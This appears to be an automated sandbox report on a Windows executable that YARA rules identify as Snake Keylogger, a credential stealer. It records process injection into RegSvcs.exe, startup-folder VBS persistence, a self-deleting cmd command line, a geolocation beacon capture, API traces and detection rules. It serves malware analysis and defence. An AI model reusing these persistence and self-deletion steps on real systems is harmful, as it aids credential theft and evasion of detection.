2025-01-11 02:45:47 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Target ID:	0
Start time:	21:45:07
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\MBOaS3GRtF.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\MBOaS3GRtF.exe"
Imagebase:	0xaa0000
File size:	1'036'288 bytes
MD5 hash:	C24D00F74E24D7717A75692E6542E8D4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	21:45:09
Start date:	10/01/2025
Path:	C:\Users\user\AppData\Local\Anglophile\supergroup.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\MBOaS3GRtF.exe"
Imagebase:	0x1c0000
File size:	1'036'288 bytes
MD5 hash:	C24D00F74E24D7717A75692E6542E8D4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.1396859862.00000000032A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000002.00000002.1396859862.00000000032A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.1396859862.00000000032A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.1396859862.00000000032A0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000002.00000002.1396859862.00000000032A0000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000002.00000002.1396859862.00000000032A0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000002.00000002.1396859862.00000000032A0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 74%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	21:45:13
Start date:	10/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\MBOaS3GRtF.exe"
Imagebase:	0x250000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.1571555540.0000000002661000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.1569174636.0000000000622000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.1569174636.0000000000622000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.1569174636.0000000000622000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000003.00000002.1569174636.0000000000622000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	21:45:26
Start date:	10/01/2025
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\supergroup.vbs"
Imagebase:	0x7ff612730000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	21:45:26
Start date:	10/01/2025
Path:	C:\Users\user\AppData\Local\Anglophile\supergroup.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Anglophile\supergroup.exe"
Imagebase:	0x1c0000
File size:	1'036'288 bytes
MD5 hash:	C24D00F74E24D7717A75692E6542E8D4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.1565558570.0000000001890000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000006.00000002.1565558570.0000000001890000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.1565558570.0000000001890000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000006.00000002.1565558570.0000000001890000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000006.00000002.1565558570.0000000001890000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000006.00000002.1565558570.0000000001890000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000006.00000002.1565558570.0000000001890000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	21:45:30
Start date:	10/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Anglophile\supergroup.exe"
Imagebase:	0xa40000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000002.1730351913.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	21:45:31
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Imagebase:	0xc30000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	21:45:31
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff68cce0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	21:45:31
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\choice.exe
Wow64 process (32bit):	true
Commandline:	choice /C Y /N /D Y /T 3
Imagebase:	0xe40000
File size:	28'160 bytes
MD5 hash:	FCE0E41C87DC4ABBE976998AD26C27E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	21:45:47
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Imagebase:	0xc30000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	21:45:47
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff68cce0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	21:45:47
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\choice.exe
Wow64 process (32bit):	true
Commandline:	choice /C Y /N /D Y /T 3
Imagebase:	0xe40000
File size:	28'160 bytes
MD5 hash:	FCE0E41C87DC4ABBE976998AD26C27E4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3.8%
Dynamic/Decrypted Code Coverage:	0.4%
Signature Coverage:	6.9%
Total number of Nodes:	2000
Total number of Limit Nodes:	24

Executed Functions

Function 00AA3B3A Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00AA3B68
IsDebuggerPresent.KERNEL32 ref: 00AA3B7A
GetFullPathNameW.KERNEL32(00007FFF,?,?,00B652F8,00B652E0,?,?), ref: 00AA3BEB

Part of subcall function 00AA7BCC: _memmove.LIBCMT ref: 00AA7C06

Part of subcall function 00AB092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00AA3C14,00B652F8,?,?,?), ref: 00AB096E

SetCurrentDirectoryW.KERNEL32(?), ref: 00AA3C6F
MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00B57770,00000010), ref: 00ADD281
SetCurrentDirectoryW.KERNEL32(?,00B652F8,?,?,?), ref: 00ADD2B9
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00B54260,00B652F8,?,?,?), ref: 00ADD33F
ShellExecuteW.SHELL32(00000000,?,?), ref: 00ADD346

Part of subcall function 00AA3A46: GetSysColorBrush.USER32(0000000F), ref: 00AA3A50
Part of subcall function 00AA3A46: LoadCursorW.USER32(00000000,00007F00), ref: 00AA3A5F
Part of subcall function 00AA3A46: LoadIconW.USER32(00000063), ref: 00AA3A76
Part of subcall function 00AA3A46: LoadIconW.USER32(000000A4), ref: 00AA3A88
Part of subcall function 00AA3A46: LoadIconW.USER32(000000A2), ref: 00AA3A9A
Part of subcall function 00AA3A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00AA3AC0
Part of subcall function 00AA3A46: RegisterClassExW.USER32(?), ref: 00AA3B16

Part of subcall function 00AA39D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00AA3A03
Part of subcall function 00AA39D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00AA3A24
Part of subcall function 00AA39D5: ShowWindow.USER32(00000000,?,?), ref: 00AA3A38
Part of subcall function 00AA39D5: ShowWindow.USER32(00000000,?,?), ref: 00AA3A41

Part of subcall function 00AA434A: _memset.LIBCMT ref: 00AA4370
Part of subcall function 00AA434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00AA4415

Strings

This is a third-party compiled AutoIt script., xrefs: 00ADD279
runas, xrefs: 00ADD33A

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
String ID: This is a third-party compiled AutoIt script.$runas
API String ID: 529118366-3287110873
Opcode ID: ee3f194c0bb3663c83b979fafe4093129ea15077052219d2e10ee4a607a6e081
Instruction ID: b5603310cb67093f0786da74c7b42918de841604ab4671a3b7ab7c0a0d3430f0
Opcode Fuzzy Hash: ee3f194c0bb3663c83b979fafe4093129ea15077052219d2e10ee4a607a6e081
Instruction Fuzzy Hash: 0951F671D04108AACF21EFB4DD15EFE7BB8AB4A710F0040A5F411A71E2CFB44A59CB21

Function 00AA49A0 Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 00AA49CD

Part of subcall function 00AA7BCC: _memmove.LIBCMT ref: 00AA7C06

GetCurrentProcess.KERNEL32(?,00B2FAEC,00000000,00000000,?), ref: 00AA4A9A
IsWow64Process.KERNEL32(00000000), ref: 00AA4AA1
GetNativeSystemInfo.KERNELBASE(00000000), ref: 00AA4AE7
FreeLibrary.KERNEL32(00000000), ref: 00AA4AF2
GetSystemInfo.KERNEL32(00000000), ref: 00AA4B23
GetSystemInfo.KERNEL32(00000000), ref: 00AA4B2F

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
String ID:
API String ID: 1986165174-0
Opcode ID: c07e6f675a0bc9f96dc43ab39e24664a3389479fd3563b964e49e69aa8daf9e9
Instruction ID: ed2bf371578f38a4e981c3c97d43f68ee47a2b9b6d43ece3a1a44788e21fe4e9
Opcode Fuzzy Hash: c07e6f675a0bc9f96dc43ab39e24664a3389479fd3563b964e49e69aa8daf9e9
Instruction Fuzzy Hash: ED91C5319897C1DEC731CB6885505AAFFF5AF6E300F4449AEE0C793B82D360A508D769

Function 00AA4E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00AA4D8E,?,?,00000000,00000000), ref: 00AA4E99
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00AA4D8E,?,?,00000000,00000000), ref: 00AA4EB0
LoadResource.KERNEL32(?,00000000,?,?,00AA4D8E,?,?,00000000,00000000,?,?,?,?,?,?,00AA4E2F), ref: 00ADD937
SizeofResource.KERNEL32(?,00000000,?,?,00AA4D8E,?,?,00000000,00000000,?,?,?,?,?,?,00AA4E2F), ref: 00ADD94C
LockResource.KERNEL32(00AA4D8E,?,?,00AA4D8E,?,?,00000000,00000000,?,?,?,?,?,?,00AA4E2F,00000000), ref: 00ADD95F

Strings

SCRIPT, xrefs: 00AA4EA6

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 4186d10f715ad1f71b749f8b899fb035896c4b95b7c779044a34fc5916010cda
Instruction ID: 9f27b02c73509c9ae5936b51d14f135a56365f6be5ae36f67b1374e10c4b2fd1
Opcode Fuzzy Hash: 4186d10f715ad1f71b749f8b899fb035896c4b95b7c779044a34fc5916010cda
Instruction Fuzzy Hash: 2F115E75240701BFD7318B65EC48F677BBAFBCAB11F104278F406972A0DBA1EC018661

Function 00AAFCE0 Relevance: 5.5, APIs: 3, Instructions: 1040COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: BuffCharUpper
String ID:
API String ID: 3964851224-0
Opcode ID: 1a8a37315e3610657ace10fe8799954c0431b7e84e395ec2db34107ffd475bdc
Instruction ID: 8ea0cbb35788f2c2b84c65f292f167894a7ece8442cdadc75e0352a0766c3c3c
Opcode Fuzzy Hash: 1a8a37315e3610657ace10fe8799954c0431b7e84e395ec2db34107ffd475bdc
Instruction Fuzzy Hash: 589269706083418FD724DF15C580B6BBBE9BF89304F14896DE88A9B3A2D775EC45CB92

Function 00B0445A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00ADE398), ref: 00B0446A
FindFirstFileW.KERNELBASE(?,?), ref: 00B0447B
FindClose.KERNEL32(00000000), ref: 00B0448B

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: 98f916a4126c50fb29163a0af9ad8e1d83b596c1f141e7a3f8ad5fb91d99487f
Instruction ID: bb1cf7d74cc4b61d92e1bc63e22637ca7efb6f4fe65e7de4767516354f1c9790
Opcode Fuzzy Hash: 98f916a4126c50fb29163a0af9ad8e1d83b596c1f141e7a3f8ad5fb91d99487f
Instruction Fuzzy Hash: 19E0D872410501A78220AB38EC4D4FD7BACDE06335F10076AF935C21D0EF745D019595

Function 00AAE6A0 Relevance: 2.4, Strings: 1, Instructions: 1102COMMON

Download Yara Rule

Strings

Variable must be of type 'Object'., xrefs: 00AE3E62

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID:
String ID: Variable must be of type 'Object'.
API String ID: 0-109567571
Opcode ID: a000a488082f330fc78d6c2079675dd4591dca1ddf1be589f7085bd71542c358
Instruction ID: 376045b2e397a1cf3d103ec68f9cfb9bce63e658f418302fa01e2fe3f15e4984
Opcode Fuzzy Hash: a000a488082f330fc78d6c2079675dd4591dca1ddf1be589f7085bd71542c358
Instruction Fuzzy Hash: DEA28C75A00205CFCB24CF98C494AAEB7F2FF5A314F248569E906AB391D775ED42CB90

Function 00AB09D0 Relevance: 57.3, APIs: 27, Strings: 5, Instructions: 1300windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00AB0A5B
timeGetTime.WINMM ref: 00AB0D16
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00AB0E53
Sleep.KERNEL32(0000000A), ref: 00AB0E61
LockWindowUpdate.USER32(00000000,?,?), ref: 00AB0EFA
DestroyWindow.USER32 ref: 00AB0F06
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00AB0F20
Sleep.KERNEL32(0000000A,?,?), ref: 00AE4E83
TranslateMessage.USER32(?), ref: 00AE5C60
DispatchMessageW.USER32(?), ref: 00AE5C6E
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00AE5C82

Strings

@TRAY_ID, xrefs: 00AE578F
@COM_EVENTOBJ, xrefs: 00AE54F0
@GUI_CTRLHANDLE, xrefs: 00AE4FE4
@GUI_WINHANDLE, xrefs: 00AE4F8F
@GUI_CTRLID, xrefs: 00AE4F3A

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
API String ID: 4212290369-3242690629
Opcode ID: 3242e60bd1f6b399cd3bebc3b8c930092493f5b7198ee669e7de46952ac0789b
Instruction ID: 219f77613e73cb82413ef1d0a0f38fbe62f6c4661e5f384592343768f0f11787
Opcode Fuzzy Hash: 3242e60bd1f6b399cd3bebc3b8c930092493f5b7198ee669e7de46952ac0789b
Instruction Fuzzy Hash: 1EB2BF70A08781DFD724DF25C994FABBBE5BF85308F14491DE589972A2CB74E844CB82

Function 00B09155 Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00B08F5F: __time64.LIBCMT ref: 00B08F69

Part of subcall function 00AA4EE5: _fseek.LIBCMT ref: 00AA4EFD

__wsplitpath.LIBCMT ref: 00B09234

Part of subcall function 00AC40FB: __wsplitpath_helper.LIBCMT ref: 00AC413B

_wcscpy.LIBCMT ref: 00B09247
_wcscat.LIBCMT ref: 00B0925A
__wsplitpath.LIBCMT ref: 00B0927F
_wcscat.LIBCMT ref: 00B09295
_wcscat.LIBCMT ref: 00B092A8

Part of subcall function 00B08FA5: _memmove.LIBCMT ref: 00B08FDE
Part of subcall function 00B08FA5: _memmove.LIBCMT ref: 00B08FED

_wcscmp.LIBCMT ref: 00B091EF

Part of subcall function 00B09734: _wcscmp.LIBCMT ref: 00B09824
Part of subcall function 00B09734: _wcscmp.LIBCMT ref: 00B09837

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00B09452
_wcsncpy.LIBCMT ref: 00B094C5
DeleteFileW.KERNEL32(?,?), ref: 00B094FB
CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00B09511
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00B09522
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00B09534

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
String ID:
API String ID: 1500180987-0
Opcode ID: a0d329566fa13c065a4212c0f587fb9b1915a5e91ccc67afa78fa5ca7609119c
Instruction ID: 62d948d7b1fe127a2128657c4f2bc927eb8a085ee38b26beff9cddc1d0e3b6e5
Opcode Fuzzy Hash: a0d329566fa13c065a4212c0f587fb9b1915a5e91ccc67afa78fa5ca7609119c
Instruction Fuzzy Hash: 9EC14FB1D00219AADF21DF95CD85EDEBBBDEF95300F0040AAF609E7191EB709A448F65

Function 00AA3015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 71
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00AA3074
